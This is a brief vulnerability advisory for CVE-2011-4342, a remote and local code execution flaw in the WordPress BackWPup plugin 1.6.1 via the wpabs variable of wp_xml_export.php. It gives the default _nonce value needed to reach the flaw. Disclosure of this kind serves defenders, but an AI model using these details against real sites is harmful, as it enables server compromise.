WordPress Plugin BackWPup Remote and Local Code Execution - CVE-2011-4342

WordPress Plugin BackWPup is prone to a vulnerability which can be exploited to execute local or remote code on the web server. The Input passed to the component wp_xml_export.php via the wpabs variable allows the inclusion and execution of local or remote PHP files as long as a _nonce value is known. The _nonce value relies on a static constant which is not defined in the script meaning that it defaults to the value 822728c8d9. WordPress Plugin BackWPup version 1.6.1 is vulnerable other versions may also be affected.